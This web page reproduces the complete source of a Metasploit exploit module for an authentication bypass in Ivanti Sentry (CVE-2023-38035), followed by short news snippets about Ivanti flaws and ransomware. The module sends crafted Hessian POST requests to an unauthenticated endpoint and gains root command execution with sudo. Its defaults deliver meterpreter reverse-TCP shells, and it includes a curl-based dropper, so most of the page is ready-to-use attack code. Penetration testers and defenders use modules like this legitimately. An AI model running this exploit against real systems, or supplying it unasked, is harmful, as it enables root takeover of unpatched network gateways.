Headline
Ivanti Sentry Authentication Bypass / Remote Code Execution
This Metasploit module exploits an authentication bypass in Ivanti Sentry which exposes API functionality which allows for code execution in the context of the root user.
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Ivanti Sentry MICSLogService Auth Bypass resulting in RCE (CVE-2023-38035)', 'Description' => %q{ This module exploits an authentication bypass in Ivanti Sentry which exposes API functionality which allows for code execution in the context of the root user. }, 'Author' => [ 'Zach Hanley', # Analysis & PoC 'James Horseman', # Analysis & PoC 'jheysel-r7' # Msf module ], 'References' => [ [ 'URL', 'https://github.com/horizon3ai/CVE-2023-38035'], [ 'URL', 'https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive/'], [ 'CVE', '2023-38035'] ], 'License' => MSF_LICENSE, 'DefaultOptions' => { 'RPORT' => 8443, 'SSL' => true, 'FETCH_WRITABLE_DIR' => '/tmp' }, 'Platform' => ['unix', 'linux'], 'Privileged' => false, 'Arch' => [ ARCH_CMD, ARCH_X64 ], 'Targets' => [ [ 'Unix (In-Memory)', { 'Platform' => ['unix', 'linux'], 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp' } } ], [ 'Linux Dropper', { 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :linux_dropper, 'DefaultOptions' => { 'CMDSTAGER::FLAVOR' => :curl, 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => '2023-08-21', 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options( [ OptBool.new('USE_SUDO', [true, 'Execute payload as root using sudo', true]), OptInt.new('SLEEP', [true, 'How long to wait for each command to run. Because the execution context does not allow for command piping or chaining the module needs to split the multi command payload by semi-colon and send each command individually', 3 ]), ] ) end def check # Unauthenticated access to the vulnerable endpoint was removed in patched versions of Sentry. # Send an unsupported GET request and see if it responds politely. res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, '/mics/services/MICSLogService'), 'method' => 'GET' ) return Exploit::CheckCode::Unknown('The target did not respond to the vulnerable endpoint') unless res return Exploit::CheckCode::Safe("A vulnerable instance should respond with an HTTP 405 with the string: 'HessianServiceExporter only supports POST requests' in the response body") unless res.code == 405 && res.body.include?('HessianServiceExporter only supports POST requests') Exploit::CheckCode::Appears end def execute_command(cmd, _opts = {}) # Below is the Hessian binary web service protocol wrapper required to invoke the function `uploadFileUsingFileInput` # which allows for unauthenticated command execution in the context of the root user. # More info on Hessian: http://hessian.caucho.com/doc/hessian-1.0-spec.xtp#Headers exploit_header = "c\x01\x00m\x00\x18uploadFileUsingFileInputMS\x00\x07commandS\x00" exploit_footer = "S\x00\x06isRootTzNz" # The sink in this RCE is java's Runtime.getRuntime.exec(). So we must prefix our command with 'sh -c $@|sh .echo' # in order to obtain full shell functionality, more info: https://codewhitesec.blogspot.com/2015/03/sh-or-getting-shell-environment-from.html cmd = "sh -c $@|sh . echo #{cmd}" cmd = "sudo #{cmd}" if datastore['USE_SUDO'] vprint_status('Running the command: ' + cmd) # Prepend the command with the length of the command as per Hessian notation data = exploit_header + [cmd.length].pack('C') + cmd + exploit_footer res = send_request_raw( 'uri' => normalize_uri(target_uri.path, '/mics/services/MICSLogService'), 'method' => 'POST', 'data' => data ) fail_with(Failure::Unreachable, 'The target did not respond to the exploit attempt') unless res fail_with(Failure::UnexpectedReply, "The response from a successful exploit attempt should be a HTTP 200 with 'isRunning' in the response body.") unless res.code == 200 && res.body.include?('isRunning') end def exploit print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") case target['Type'] when :unix_cmd execute_command(payload.encoded) when :linux_dropper execute_cmdstager end endend
Related news
Cybersecurity researchers have shed light on a new version of a ransomware strain called HardBit that comes packaged with new obfuscation techniques to deter analysis efforts. "Unlike previous versions, HardBit Ransomware group enhanced the version 4.0 with passphrase protection," Cybereason researchers Kotaro Ogino and Koshi Oyama said in an analysis. "The passphrase needs to be provided during
Ivanti has released security updates to address a critical flaw impacting its Endpoint Manager (EPM) solution that, if successfully exploited, could result in remote code execution (RCE) on susceptible servers. Tracked as CVE-2023-39336, the vulnerability has been rated 9.6 out of 10 on the CVSS scoring system. The shortcoming impacts EPM 2021 and EPM 2022 prior to SU5. “If exploited, an
Categories: Exploits and vulnerabilities Categories: News Tags: Ivanti Tags: Sentry Tags: MobileIron Tags: CVE-2023-38035 Tags: MICS Tags: port 8443 There is some uncertainty about whether a vulnerability in Ivanti Sentry is being exploited in the wild, but why take the risk when you can patch? (Read more...) The post Ivanti Sentry critical vulnerability—don't play dice, patch appeared first on Malwarebytes Labs.
Software services provider Ivanti is warning of a new critical zero-day flaw impacting Ivanti Sentry (formerly MobileIron Sentry) that it said is being actively exploited in the wild, marking an escalation of its security woes. Tracked as CVE-2023-38035 (CVSS score: 9.8), the issue has been described as a case of authentication bypass impacting versions 9.18 and prior due to what it called an
A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.